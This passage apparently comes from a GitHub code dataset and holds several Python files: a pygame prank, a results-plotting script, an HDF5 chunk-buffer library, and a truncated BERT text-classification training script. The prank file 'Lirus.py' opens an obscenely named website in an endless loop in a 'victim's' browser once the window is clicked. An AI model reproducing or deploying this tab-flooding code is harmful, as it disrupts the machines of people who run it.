and modules\nimport pygame #Pygame garbage\nfrom pygame.constants import MOUSEBUTTONDOWN #Pygame being able to sense when the Pygame window is being clicked\nimport webbrowser #This is used so Lirus can open websites\n\n#Resolution of the image/Width and height of the window\nX = 320 #Width\nY = 191 #Height \n\npygame.init() #pygame becomes real\n\ndisplay_surface = pygame.display.set_mode((X, Y ))\n \npygame.display.set_caption('DONT WAIT') #Window name\n \nimage = pygame.image.load(r'techtips.jpg') #The image that we want to load\n \nwhile True:\n\n display_surface.blit(image, (0, 0)) #Displays the image in the Pygame window\n\n for event in pygame.event.get():\n\n #If the window is clicked, open many web pages in the \"victim's\" default web browser\n if event.type == MOUSEBUTTONDOWN:\n while True:\n webbrowser.open(\"https://linus-sex.tips/\", new=1) \n\n pygame.display.update() #Refresh the screen\n","repo_name":"remstik/Lirus","sub_path":"Lirus.py","file_name":"Lirus.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28835501078","text":"import os\nimport numpy as np\n\nshould_save = True\n\n# ----- Parse command-line args -----\n\nif len(os.sys.argv) < 2:\n print(\"Please provide a folder containing results.\")\n os.sys.exit(1)\n\nres_folder = os.sys.argv[1]\n\nif len(os.sys.argv) > 2:\n should_save = bool(int(os.sys.argv[2]))\n qualifier = \"Will\" if should_save else \"Won't\"\n print(qualifier + \" save plot\")\n\n# ----- Load in hyperparameters -----\n\nhyper_loc = os.path.join(res_folder, 'hyperparams.txt')\nwith open(hyper_loc, 'r') as hyper_file:\n hyper_str = hyper_file.readline() # Hyperparam dict on first line\n # Name of training file on second line\n train_file_name = hyper_file.readline().split(': ')[-1]\n\ntrain_file_name = train_file_name.strip()\ntrain_file = os.path.join(res_folder, os.path.pardir, os.path.pardir,\n 'training', train_file_name)\n\n# Load in training data\nwith np.load(train_file) as f:\n training_in = f['x']\n training_out = f['y']\n true_in = f['x_true']\n true_out = f['y_true']\n\n# Load in network outputs\noutput_file = os.path.join(res_folder, 'output.npz')\nwith np.load(output_file) as f:\n predictions_in = f['inputs']\n predictions_out = f['predictions']\n\n\n# ----- Plot results -----\n\nimport matplotlib.pyplot as plt\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n# Plot predictions, training data, and \"true\" (non-noisy) curve\ntrue_curve, = plt.plot(true_in, true_out, c='g')\npredicted_scatter = plt.scatter(predictions_in, predictions_out,\n c='r', marker='x')\ninput_scatter = plt.scatter(training_in, training_out, c='b', marker='o')\n\nplt.legend([true_curve, input_scatter, predicted_scatter],\n ['True Curve', 'Training Data', 'Prediction'], scatterpoints=1)\nplt.xlabel(\"$x$\", fontsize=18)\n\ny_str = r'$f(x)$'\nif 'sinc' in train_file:\n y_str = r'sinc$(x)$'\nelif 'sin' in train_file:\n y_str = r'$\\sin (x)$'\nelif 'x_cubed' in train_file:\n y_str = r'$x^3$'\n\nplt.ylabel(y_str, fontsize=18)\n\nif should_save:\n save_path = os.path.join(res_folder, 'plot.eps')\n plt.savefig(save_path, bbox_inches='tight')\n print(\"Saved plot to: \" + save_path)\n\nplt.show()\n","repo_name":"lewis-od/QNN","sub_path":"plot_output.py","file_name":"plot_output.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} 
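The plot_output.py record above hard-codes the layout of its input files: a training .npz with keys x, y (noisy samples) and x_true, y_true (the clean curve), plus an output.npz with inputs and predictions. As a quick illustration of that contract (not part of the repo -- the file name, ranges, sample count, and noise level below are invented), a compatible training file for the sin case could be generated like this:

import numpy as np

x_true = np.linspace(-3.0, 3.0, 200)                  # dense grid for the clean curve
y_true = np.sin(x_true)                               # the "true" (non-noisy) curve
x = np.random.uniform(-3.0, 3.0, 50)                  # random training inputs
y = np.sin(x) + np.random.normal(0.0, 0.1, x.shape)   # noisy training targets
np.savez('sin_training.npz', x=x, y=y, x_true=x_true, y_true=y_true)

A file produced this way satisfies every np.load access in the plotting script, and because 'sin' appears in the file name, the script's y-axis label logic would pick the sin label.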
+{"seq_id":"1152009085","text":"from contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import List, Optional, Tuple, Union\n\nimport h5py as h5\nimport numpy as np\n\nfrom .h5utils import get_dataset_name, open_or_pass_file, open_or_pass_dataset\nfrom .types import File, Dataset, Shape, DType\n\n\nclass ChunkBuffer:\n \"\"\"\n Hold a buffer to a single chunk of an HDF5 dataset.\n\n This class stores a chunk of an HDF5 dataset in memory as a numpy array and provides methods\n for synchronizing the buffer with the file.\n It is important to note that ChunkBuffer never reads from or writes to the file on its own.\n The user must call the corresponding methods to ensure that the buffer and file are up to date.\n\n ChunkBuffer maintains an index to a chunk in the dataset.\n A chunk index is a tuple of ndim numbers, where ndim is the number of dimensions (ranks)\n of the dataset.\n This index can be changed with the 'select' method.\n The 'read' and 'write' methods use the currently selected index if not given a different index\n as an argument (only 'read').\n\n It is possible to handle chunks that are not fully filled (size of dataset is not a multiple\n of the chunk size).\n However, ChunkBuffer always holds a full chunk in memory and does not maintain any information\n on how much the chunk is filled as the user has direct write access to the underlying array.\n The read and write methods can return / take as argument the fill level of the chunk and the\n user has to use those appropriately.\n The 'fill level' is a tuple or list of integers that indicates for each dimension how many\n elements are in use.\n For example, for a fully filled chunk, fill_level = chunk_shape.\n For a half filled chunk, fill_level = [size // 2 for size in chunk_shape].\n \"\"\"\n\n def __init__(self, file: File,\n dataset: Dataset,\n shape: Shape = None,\n dtype: DType = None,\n data: Optional[np.ndarray] = None,\n maxshape: Shape = None):\n \"\"\"\n Construct a ChunkBuffer in memory.\n Does not verify if a suitable dataset exists in the file or create one.\n The first chunk of the dataset is selected.\n\n :param file: The file that the dataset lives in.\n :param dataset: The dataset to buffer.\n :param shape: Shape of the *chunk*, not the whole dataset. Required if data is None.\n :param dtype: Datatype of the dataset.\n :param data: Initial data for the *chunk*, not the whole dataset.\n The chunk shape is inferred from this if argument shape is None, otherwise,\n attempts to reshape the array.\n :param maxshape: Maximum shape of the dataset.\n \"\"\"\n\n # special casing on str instead of converting any file to Path allows for streams\n self._filename = (Path(file.filename) if isinstance(file, h5.File)\n else (Path(file) if isinstance(file, str) else file))\n self._dataset_name = get_dataset_name(dataset)\n\n if data is not None:\n self._buffer = np.array(data, dtype=dtype)\n if shape is not None:\n self._buffer = self._buffer.reshape(shape)\n else:\n self._buffer = np.empty(shape, dtype=dtype)\n\n self._maxshape = tuple(maxshape) if isinstance(maxshape, (tuple, list)) else (None,) * self._buffer.ndim\n if len(self._maxshape) != len(self._buffer.shape):\n raise ValueError(f\"Argument maxshape {maxshape} has wrong number of dimensions. 
\"\n f\"Expected {len(self._buffer.shape)} according to buffer shape.\")\n\n self._chunk_index = (0,) * self._buffer.ndim\n\n @classmethod\n def load(cls, file: File,\n dataset: Dataset,\n chunk_index: Shape,\n o_fill_level: Optional[List[int]] = None):\n \"\"\"\n Load a chunk of an existing dataset.\n\n :param file: The file containing the dataset.\n :param dataset: The dataset to load. Must be chunked.\n :param chunk_index: The chunk to load.\n :param o_fill_level: If given a list, it is filled with the fill level of the loaded chunk.\n :return: A newly constructed ChunkBuffer.\n \"\"\"\n\n with open_or_pass_dataset(file, dataset, None, \"r\") as dataset:\n chunk_buffer = cls(file, dataset, dataset.chunks, dtype=dataset.dtype, maxshape=dataset.maxshape)\n chunk_buffer.select(_normalise_chunk_index(chunk_index,\n _chunk_number(dataset.shape, chunk_buffer._buffer.shape)))\n fill_level = chunk_buffer.read(dataset=dataset)\n\n if o_fill_level is not None:\n o_fill_level.clear()\n o_fill_level.extend(fill_level)\n return chunk_buffer\n\n @property\n def data(self) -> np.ndarray:\n \"\"\"\n A view of the stored buffer.\n You can read and modify the data contained in the buffer through this view.\n\n Note that this only accesses the buffer in memory, you need to call\n read / write to synchronise with the file.\n \"\"\"\n return self._buffer.view()\n\n @property\n def shape(self) -> Shape:\n \"\"\"\n The shape of the buffer, that is the shape of a single chunk.\n \"\"\"\n return self._buffer.shape\n\n @property\n def ndim(self) -> int:\n \"\"\"\n The number of dimensions (ranks) of the dataset.\n \"\"\"\n return self._buffer.ndim\n\n @property\n def dtype(self) -> np.dtype:\n \"\"\"\n The datatype of the dataset.\n \"\"\"\n return self._buffer.dtype\n\n @property\n def maxshape(self) -> Shape:\n \"\"\"\n The maximum shape of the dataset.\n \"\"\"\n return self._maxshape\n\n @property\n def chunk_index(self) -> Shape:\n \"\"\"\n The current chunk index (immutable).\n \"\"\"\n return self._chunk_index\n\n @property\n def filename(self) -> Path:\n \"\"\"\n The name of the HDF5 file.\n \"\"\"\n return self._filename\n\n @property\n def dataset_name(self) -> Path:\n \"\"\"\n The full path of the dataset inside of the HDF5 file.\n \"\"\"\n return self._dataset_name\n\n def select(self, chunk_index: Shape):\n \"\"\"\n Select a chunk.\n\n This function verifies that the index is valid based on metadata that is available in memory.\n No synchronisation with the file happens, in particular the chunk is not read from the file\n and the buffer keeps its prior contents.\n\n :param chunk_index: A tuple of indices of the chunk to select. All indices must be positive.\n \"\"\"\n\n # validate index\n if len(chunk_index) != self.ndim:\n raise IndexError(f\"Invalid index dimension {len(chunk_index)} for dataset dimension {self.ndim}.\")\n for dim, (index, length, maxlength) in enumerate(zip(chunk_index, self._buffer.shape, self._maxshape)):\n if index < 0:\n raise IndexError(f\"Negative chunk_index in dimension {dim}. 
Only positive values allowed.\")\n if maxlength is not None and index * length >= maxlength:\n raise IndexError(f\"chunk_index {chunk_index} out of bounds in dimension {dim} \"\n f\"with maxshape {self._maxshape}\")\n\n self._chunk_index = chunk_index\n\n @contextmanager\n def _load_or_pass_dataset(self, file: Optional[File], dataset: Optional[Dataset], filemode: str):\n \"\"\"\n Contextmanager to load a dataset from file or pass along the argument.\n \"\"\"\n\n if dataset is None:\n with open_or_pass_file(file, self._filename, filemode) as h5f:\n yield h5f[str(self._dataset_name)]\n else:\n dataset_name = get_dataset_name(dataset)\n if dataset_name != self.dataset_name:\n raise ValueError(f\"Wrong dataset. Stored: {self.dataset_name}, you passed in {dataset_name}.\")\n # Only check if self._filename is a Path in order to allow for storing streams.\n if isinstance(self._filename, Path) and dataset.file.filename != str(self._filename):\n raise ValueError(f\"Dataset is not in the stored file ({self._filename}).\")\n\n if isinstance(dataset, h5.Dataset):\n yield dataset\n else:\n with open_or_pass_file(file, self._filename, filemode) as h5f:\n yield h5f[str(dataset)]\n\n @contextmanager\n def _retrieve_dataset(self, file: Optional[File], dataset: Optional[Dataset], filemode: str):\n \"\"\"\n Contextmanager to get a handle to the dataset.\n Checks metadata of self against the file.\n \"\"\"\n\n with self._load_or_pass_dataset(file, dataset, filemode) as dataset:\n def raise_error(name, in_file, in_memory):\n raise RuntimeError(f\"The {name} of dataset {dataset.name} in file {dataset.file.filename} ({in_file}) \"\n f\"does not match the {name} of ChunkBuffer ({in_memory}).\")\n\n if dataset.chunks != self._buffer.shape:\n raise_error(\"chunk shape\", dataset.chunks, self._buffer.shape)\n if dataset.dtype != self._buffer.dtype:\n raise_error(\"datatype\", dataset.dtype, self._buffer.dtype)\n if dataset.maxshape != self._maxshape:\n raise_error(\"maximum shape\", dataset.maxshape, self._maxshape)\n\n yield dataset\n\n def read(self, chunk_index: Optional[Shape] = None,\n file: Optional[File] = None,\n dataset: Optional[Dataset] = None) -> Union[List[int], Tuple[int, ...]]:\n \"\"\"\n Read a chunk from the file.\n\n The chunk must exist in the dataset in the HDF5 file.\n All stored metadata is checked against the file and an error is raised if there is a mismatch.\n\n An existing file or dataset handle to a currently open connection can be passed in as arguments\n to avoid opening the file on every call to this function.\n\n :param chunk_index: Index of the chunk to read.\n If None, use currently selected chunk, i.e. self.chunk_index.\n :param file: Indicates the file to read from. 
If given, it must match the filename stored in the buffer.\n        :param dataset: Indicates the dataset to read from.\n        :return: The fill level of the chunk.\n        \"\"\"\n\n        with self._retrieve_dataset(file, dataset, \"r\") as dataset:\n            if chunk_index is not None:\n                self.select(chunk_index)\n            nchunks = _chunk_number(dataset.shape, self._buffer.shape)\n            for dim, (i, n) in enumerate(zip(self.chunk_index, nchunks)):\n                if i >= n:\n                    raise IndexError(f\"Chunk index {i} out of bounds in dimension {dim} with number of chunks = {n}\")\n\n            fill_level = _chunk_fill_level(dataset.shape, self._buffer.shape, self._chunk_index, nchunks)\n            dataset.read_direct(self._buffer,\n                                source_sel=_chunk_slices(self._chunk_index, self._buffer.shape),\n                                dest_sel=tuple(slice(0, n) for n in fill_level))\n            return fill_level\n\n    def write(self, must_exist: bool,\n              fill_level: Optional[Union[List[int], Tuple[int, ...]]] = None,\n              file: Optional[File] = None,\n              dataset: Optional[Dataset] = None):\n        \"\"\"\n        Write the currently selected chunk to the file.\n\n        All stored metadata is checked against the file and an error is raised if there is a mismatch.\n\n        An existing file or dataset handle to a currently open connection can be passed in as arguments\n        to avoid opening the file on every call to this function.\n\n        :param must_exist: If True, raise an error if the chunk is not already allocated in the dataset.\n                           If False, resize the dataset to include the chunk but only up to the fill level.\n        :param fill_level: For each dimension, indicate the fill level of the chunk.\n                           Only the parts of the buffer within the fill level are written.\n        :param file: Indicates the file to write to. If given, it must match the filename stored in the buffer.\n        :param dataset: Indicates the dataset to write to.\n        \"\"\"\n\n        fill_level = self._buffer.shape if fill_level is None else fill_level\n        required_shape = _required_dataset_shape(self._chunk_index,\n                                                 self._buffer.shape,\n                                                 fill_level)\n\n        with self._retrieve_dataset(file, dataset, \"a\") as dataset:\n            if any(required > current\n                   for required, current in zip(required_shape, dataset.shape)):\n                if must_exist:\n                    raise RuntimeError(f\"The currently selected chunk {self._chunk_index} \"\n                                       f\"does not exist in dataset {dataset.name}. \"\n                                       \"Use must_exist=False to resize.\")\n                else:\n                    dataset.resize(max(required, existing)\n                                   for required, existing in zip(required_shape,\n                                                                 dataset.shape))\n\n            dataset.write_direct(self._buffer,\n                                 source_sel=tuple(slice(0, n) for n in fill_level),\n                                 dest_sel=_chunk_slices(self._chunk_index, self._buffer.shape))\n\n    def create_dataset(self, file: Optional[File] = None,\n                       filemode: str = \"a\",\n                       write: bool = True,\n                       fill_level: Optional[Union[List[int], Tuple[int, ...]]] = None):\n        \"\"\"\n        Create a new dataset in the file big enough to contain the currently selected chunk.\n\n        :param file: If given, use this file handle to access the HDF5 file, otherwise use the stored filename.\n        :param filemode: Open-mode of the file, see documentation of h5py.File.\n        :param write: If True, write the buffer to the dataset.\n                      Only the selected chunk is written, the content of the other chunks is undefined.\n                      If False, no data is written, the contents of the dataset are undefined.\n        :param fill_level: For each dimension, indicate the fill level of the chunk.\n                           Used for computing the shape of the dataset and which parts of the buffer to write.\n        \"\"\"\n\n        fill_level = self._buffer.shape if fill_level is None else fill_level\n\n        with open_or_pass_file(file, self._filename, filemode) as h5f:\n            dataset = h5f.create_dataset(str(self._dataset_name),\n                                         _required_dataset_shape(self._chunk_index,\n                                                                 self._buffer.shape,\n                                                                 fill_level),\n                                         chunks=self._buffer.shape,\n                                         maxshape=self._maxshape,\n                                         dtype=self.dtype)\n            if write:\n                self.write(True, dataset=dataset, fill_level=fill_level)\n\n\ndef _normalise_chunk_index(chunk_index: Shape, nchunks: Shape) -> Shape:\n    \"\"\"\n    Make sure the chunk index is within bounds and return a new tuple where all negative indices are\n    replaced by corresponding positive ones.\n    \"\"\"\n\n    if len(chunk_index) != len(nchunks):\n        raise IndexError(f\"Invalid index dimension {len(chunk_index)} for dataset dimension {len(nchunks)}\")\n\n    normalised = []\n    for index, length in zip(chunk_index, nchunks):\n        if not (-length <= index < length):\n            raise IndexError(f\"chunk_index {chunk_index} is out of range with number of chunks {nchunks}\")\n        normalised.append(index if index >= 0 else length + index)\n    return tuple(normalised)\n\n\ndef _tuple_ceildiv(numerator: Shape, denominator: Shape) -> Shape:\n    # -(-n // d) computes ceil(n / d) but to infinite precision.\n    return tuple(-(-num // den) for num, den in zip(numerator, denominator))\n\n\ndef _chunk_number(full_shape: Shape, chunk_shape: Shape) -> Shape:\n    \"\"\"\n    :param full_shape: Shape of the entire dataset.\n    :param chunk_shape: Shape of a single chunk.\n    :return: Number of chunks in every dimension.\n    \"\"\"\n    return _tuple_ceildiv(full_shape, chunk_shape)\n\n\ndef _chunk_fill_level(full_shape: Shape, chunk_shape: Shape, chunk_index: Shape, nchunks: Shape) -> Shape:\n    \"\"\"\n    :param full_shape: Shape of the entire dataset.\n    :param chunk_shape: Shape of a single chunk.\n    :param chunk_index: Index of a chunk.\n    :param nchunks: Number of chunks.\n    :return: Fill level of the given chunk.\n    \"\"\"\n\n    # The modulo operation evaluates to\n    # for i in range(2*n): n - (-i % n)\n    # -> n, 1, 2, ..., n-2, n-1, n, 1, 2, ..., n-2, n-1\n    # This is needed because remainder = 0 means the chunk is fully filled, i.e. 
fill_level = n.\n    return tuple(chunk - (-full % chunk) if idx == nchunk - 1 else chunk\n                 for full, chunk, idx, nchunk in zip(full_shape, chunk_shape, chunk_index, nchunks))\n\n\ndef _chunk_slices(chunk_index: Shape, chunk_shape: Shape) -> Tuple[slice, ...]:\n    \"\"\"\n    :param chunk_index: Index of a chunk.\n    :param chunk_shape: Shape of chunks.\n    :return: Slices into the dataset to address the given chunk.\n    \"\"\"\n    return tuple(slice(i * n, (i + 1) * n)\n                 for i, n in zip(chunk_index, chunk_shape))\n\n\ndef _required_dataset_shape(chunk_index: Shape, chunk_shape: Shape, fill_level: Union[Shape, List[int]]) -> Shape:\n    \"\"\"\n    Return the minimum dataset shape to include the given chunk with the given fill level.\n    \"\"\"\n    for dim, (length, fl) in enumerate(zip(chunk_shape, fill_level)):\n        if fl > length:\n            raise ValueError(f\"Fill level {fill_level} is greater than chunk shape {chunk_shape} in dimension {dim}.\")\n    return tuple(idx * length + fl\n                 for idx, length, fl in zip(chunk_index, chunk_shape, fill_level))\n","repo_name":"jl-wynen/pentinsula","sub_path":"pentinsula/chunkbuffer.py","file_name":"chunkbuffer.py","file_ext":"py","file_size_in_byte":18285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72805390121","text":"# Classification model training\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'  # set the GPU id\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom bert4keras.backend import keras, K, search_layer\nfrom bert4keras.models import build_transformer_model\nfrom bert4keras.optimizers import extend_with_gradient_accumulation\nfrom bert4keras.snippets import sequence_padding, DataGenerator\nfrom bert4keras.tokenizers import Tokenizer\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, Callback\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras.layers import *\nfrom keras.optimizers import Adam\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import StratifiedKFold  # stratified K-fold\nfrom keras.utils import multi_gpu_model\nfrom multi_gpu import to_multi_gpu\n\n\n# bert config (using the rank-1 team's pretrained weights here; training our own would be too much work, but this runs and is easy to follow)\nconfig_path = 'bert/chinese_L-12_H-768_A-12/bert_config.json'\ncheckpoint_path = 'bert/chinese_L-12_H-768_A-12/bert_model.ckpt'\ndict_path = 'bert/chinese_L-12_H-768_A-12/vocab.txt'\n\nn = 5  # cross-validation\nseed = 2020\nnum_classes = 10\n\nmaxlen = 512\nmax_segment = 2  # maximum number of segments\nbatch_size = 4\n# batch_size = batch_size_per_replica * strategy.num_replicas_in_sync\ngrad_accum_steps = 64  # gradient accumulation: accumulate gradients for several steps before updating\ndrop = 0.2  # dropout\nlr = 2e-5\nepochs = 3\n\n\ndef load_data(df):\n    \"\"\" Load the data \"\"\"\n    D = list()\n    for _, row in df.iterrows():  # read row by row\n        text = row['content']\n        label = row['label_id']\n        D.append((text, int(label)))\n    # D = [(text1, label1), (text2, label2), ...]\n    return D\n\n\n# build the tokenizer\ntokenizer = Tokenizer(dict_path, do_lower_case=True)\n\n\ndef sentence_split(words):\n    \"\"\" Split a document into segments \"\"\"\n    # Measured document lengths average around 1020 (mean: 1074.372215, std: 1090.884148), hence 1530 is used\n    document_len = len(words)  # total document length\n    # [0, 510, 1020, 1530, 2040, 2550, 3060, 3570, 4080, 4590]\n    # start indices of the document split by maxlen (without the position of the final piece, i.e. the part shorter than maxlen)\n    index = list(range(0, document_len, maxlen-2))\n    index.append(document_len)  # append the final position\n\n    segments = []\n    for i in range(len(index) - 1):\n        # a standard (maxlen-2)-token slice; a whole document is too long, so it must be truncated like this for training\n        segment = words[index[i]: index[i + 1]]\n        assert len(segment) > 0\n        # convert to ids and add the leading [CLS] and trailing [SEP]\n        segment = tokenizer.tokens_to_ids(['[CLS]'] + segment + ['[SEP]'])\n        
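        # (Added note, not from the original repo.) Each slice above is maxlen-2 = 510
        # tokens long so that, together with the [CLS] and [SEP] ids just added, every
        # segment holds at most maxlen = 512 ids, which is BERT's input length limit.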
segments.append(segment)\n\n    assert len(segments) > 0\n    # Cap the number of segments at max_segment, since BERT's input takes no more than two\n    # if there are more than max_segment segments\n    if len(segments) > max_segment:\n        segment_ = int(max_segment / 2)\n        # keep only the opening and closing segments (two in total) to satisfy max_segment\n        return segments[:segment_] + segments[-segment_:]\n    else:\n        return segments\n\n\nclass data_generator(DataGenerator):\n    \"\"\" Data generator \"\"\"\n    def __init__(self, data, batch_size=32, buffer_size=None, random=False):\n        super().__init__(data, batch_size, buffer_size)\n        self.random = random\n\n    def __iter__(self, random=False):\n        batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n        for is_end, (text, label) in self.sample(random):\n            token_ids = sentence_split(text)  # split into segments\n            token_ids = sequence_padding(token_ids, length=maxlen)  # padding\n            segment_ids = np.zeros_like(token_ids)  # all-zero array with the same shape as token_ids\n\n            batch_token_ids.append(token_ids)\n            batch_segment_ids.append(segment_ids)\n            batch_labels.append([label])\n\n            # pad all of the ids\n            if len(batch_token_ids) == self.batch_size or is_end:\n                batch_token_ids = sequence_padding(\n                    batch_token_ids, length=max_segment\n                )\n                batch_segment_ids = sequence_padding(\n                    batch_segment_ids, length=max_segment\n                )\n                batch_labels = sequence_padding(batch_labels)\n\n                yield [batch_token_ids, batch_segment_ids], batch_labels\n                batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n\n    def forfit(self):\n        while True:\n            for d in self.__iter__(self.random):\n                yield d\n\n\nclass Attention(Layer):\n    \"\"\" Attention layer \"\"\"\n    def __init__(self, hidden_size, **kwargs):\n        self.hidden_size = hidden_size\n        super().__init__(**kwargs)\n\n    def build(self, input_shape):\n        initializer = keras.initializers.truncated_normal(mean=0.0, stddev=0.05)  # truncated normal initialization\n        # create a trainable weight for this layer\n        self.weight = self.add_weight(\n            name='weight',\n            shape=(self.hidden_size, self.hidden_size),\n            initializer=initializer,\n            trainable=True\n        )\n        # create a trainable weight for this layer\n        self.bias = self.add_weight(\n            name='bias',\n            shape=(self.hidden_size,),\n            initializer='zero',\n            trainable=True\n        )\n        # create a trainable weight for this layer\n        self.query = self.add_weight(\n            name='query',\n            shape=(self.hidden_size, 1),\n            initializer=initializer,\n            trainable=True\n        )\n\n        super().build(input_shape)  # be sure to call this at the end\n\n    def call(self, x):\n        x, mask = x\n        # self.weight has only two dimensions, so the mask's dimensions must be adjusted here\n        mask = K.squeeze(mask, axis=2)  # squeeze out axis 2; the data itself is unchanged\n        # linear transformation\n        # K.dot() performs the matrix product, then self.bias is added\n        key = K.bias_add(K.dot(x, self.weight), self.bias)\n\n        # compute attention\n        outputs = K.squeeze(K.dot(key, self.query), axis=2)  # compute the attention scores\n        outputs -= 1e32 * (1 - mask)\n\n        attn_scores = K.softmax(outputs)  # score with softmax\n        attn_scores *= mask\n        attn_scores = K.reshape(\n            attn_scores, shape=(-1, 1, attn_scores.shape[-1])\n        )\n\n        outputs = K.squeeze(K.batch_dot(attn_scores, key), axis=1)\n\n        return outputs\n\n    def compute_output_shape(self, input_shape):\n        return input_shape[0][0], self.hidden_size\n\n\ndef build_model():\n    \"\"\" Build the model \"\"\"\n    token_ids = Input(shape=(max_segment, maxlen), dtype='int32')\n    segment_ids = Input(shape=(max_segment, maxlen), dtype='int32')\n\n    input_mask = Masking(mask_value=0)(token_ids)  # apply masking to the input token_ids\n    # K.any() reduces first, then the type is converted\n    # it can convert a Keras variable but still returns a Keras tensor (type cast)\n    input_mask = Lambda(\n        lambda x: K.cast(K.any(x, axis=2, keepdims=True), 'float32')\n    )(input_mask)\n\n    # reshape: merge the batch and segment dimensions into one\n    token_ids1 = Lambda(\n        lambda x: K.reshape(x, shape=(-1, maxlen))\n    )(token_ids)\n    segment_ids1 = Lambda(\n        lambda x: K.reshape(x, shape=(-1, maxlen))\n    )(segment_ids)\n\n    # load the pretrained model\n    bert = build_transformer_model(\n        config_path=config_path,\n        checkpoint_path=checkpoint_path,\n        return_keras_model=False,\n    )\n    output = bert.model([token_ids1, segment_ids1])\n    output = Lambda(lambda x: x[:, 0])(output)  # take [CLS]: keep only the first position\n    # reshape the dimensions back\n    output = Lambda(\n        lambda x: K.reshape(x, shape=(-1, max_segment, output.shape[-1]))\n    )(output)\n    output = Multiply()([output, input_mask])  # multiply the output by input_mask; shape is unchanged\n    output = Dropout(drop)(output)\n\n    output = Attention(output.shape[-1].value)([output, input_mask])  # apply attention\n    output = Dropout(drop)(output)\n    # FC linear layer\n    output = Dense(\n        units=num_classes,\n        activation='softmax',\n        kernel_initializer=bert.initializer\n    )(output)\n\n    model = keras.models.Model([token_ids, segment_ids], output)\n    # multi-GPU setup\n    # set up the optimizer and its parameters\n    optimizer_params = {\n        'learning_rate': lr,\n        'grad_accum_steps': grad_accum_steps\n    }\n\n    optimizer = extend_with_gradient_accumulation(Adam)  # add gradient accumulation\n    optimizer = optimizer(**optimizer_params)\n\n    # multi gpu\n\n    model.compile(\n        loss='sparse_categorical_crossentropy',\n        optimizer=optimizer,\n        metrics=['sparse_categorical_accuracy'],\n    )\n\n    return model\n\n\ndef adversarial_training(model, embedding_name, epsilon=1.):\n    \"\"\" Add adversarial training to the model.\n    model is the Keras model that needs adversarial training, and embedding_name\n    is the name of the Embedding layer inside model. Use after the model is compiled.\n    \"\"\"\n    if model.train_function is None:  # if there is no train function yet\n        model._make_train_function()  # make it manually\n    old_train_function = model.train_function  # back up the old train function\n\n    # find the Embedding layer\n    for output in model.outputs:\n        embedding_layer = search_layer(output, embedding_name)\n        if embedding_layer is not None:\n            break\n    if embedding_layer is None:\n        raise Exception('Embedding layer not found')\n\n    # compute the Embedding gradients\n    embeddings = embedding_layer.embeddings  # Embedding matrix\n    gradients = K.gradients(model.total_loss, [embeddings])  # Embedding gradients\n    gradients = K.zeros_like(embeddings) + gradients[0]  # convert to a dense tensor\n\n    # wrap as a function\n    inputs = (\n        model._feed_inputs + model._feed_targets + model._feed_sample_weights\n    )  # all input layers\n\n    embedding_gradients = K.function(\n        inputs=inputs,\n        outputs=[gradients],\n        name='embedding_gradients',\n    )  # wrapped as a function\n\n    def train_function(inputs):  # redefine the train function\n        grads = embedding_gradients(inputs)[0]  # Embedding gradients\n        delta = epsilon * grads / (np.sqrt((grads**2).sum()) + 1e-8)  # compute the perturbation\n        K.set_value(embeddings, K.eval(embeddings) + delta)  # inject the perturbation\n        outputs = old_train_function(inputs)  # gradient descent step\n        K.set_value(embeddings, K.eval(embeddings) - delta)  # remove the perturbation\n        return outputs\n\n    model.train_function = train_function  # override the original train function\n\n\nclass Evaluator(Callback):\n    def __init__(self, valid_generator):\n        super().__init__()\n        self.valid_generator = valid_generator  # validation data generator\n        self.best_val_f1 = 0.\n\n    def evaluate(self):\n        y_true, y_pred = list(), list()\n        for x, y in self.valid_generator:\n            y_true.append(y)  # ground truth\n            y_pred.append(self.model.predict(x).argmax(axis=1))  # predictions\n        y_true = np.concatenate(y_true)  # concatenate all results\n        y_pred = np.concatenate(y_pred)  # concatenate all results\n        f1 = f1_score(y_true, y_pred, average='macro')  # compute the F1 score\n        return f1\n\n    def on_epoch_end(self, epoch, logs=None):  # runs at the end of every epoch\n        val_f1 = self.evaluate()  # get the F1\n        if val_f1 > self.best_val_f1:  # if this epoch's F1 beats the best so far, replace it\n            self.best_val_f1 = val_f1\n        logs['val_f1'] = val_f1\n        print(f'val_f1: {val_f1:.5f}, best_val_f1: {self.best_val_f1:.5f}')\n\n\n# Run training\ndef do_train(df_train):\n    # n folds\n    skf = StratifiedKFold(n_splits=n, random_state=seed, shuffle=True)  # configure the n folds\n    # skf.split(df_train['text'], df_train['label']) splits the data, producing train and valid sets\n    # enumerate(data, 1) 
表示下标从1开始,即 fold从1开始计算\n for fold, (train_idx, valid_idx) in enumerate(skf.split(df_train['content'], df_train['label_id']), 1):\n print(f'Fold {fold}')\n # 加载数据\n train_data = load_data(df_train.iloc[train_idx])\n valid_data = load_data(df_train.iloc[valid_idx])\n # 加入数据迭代器中\n train_generator = data_generator(train_data, batch_size, random=True)\n valid_generator = data_generator(valid_data, batch_size)\n\n model = build_model() # 构建模型\n # strategy = tf.distribute.MirroredStrategy()\n # print('Number of devices: %d' % strategy.num_replicas_in_sync) # 输出设备数量\n # with strategy.scope():\n # model = build_model()\n # model.summary()\n\n # 加入对抗训练\n adversarial_training(model, 'Embedding-Token', 0.5) # 加入对抗训练\n # 回调函数\n callbacks = [\n Evaluator(valid_generator), # 每个epoch结束时,就会执行验证\n EarlyStopping(\n monitor='val_f1',\n patience=5,\n verbose=1,\n mode='max'), # 早期停止条件,监控val_f1值,如果5次都没有超过最佳f1,那么就停止训练\n ReduceLROnPlateau(\n monitor='val_f1',\n factor=0.5,\n patience=2,\n verbose=1,\n mode='max'), # 当训练的模型停止提升的时候,就减少学习率,看是否能够继续提升\n ModelCheckpoint(\n f'weights-{fold}.h5', # 保存路径 避免文件名被覆盖\n monitor='val_f1',\n save_weights_only=True,\n save_best_only=True,\n verbose=1,\n mode='max'), # 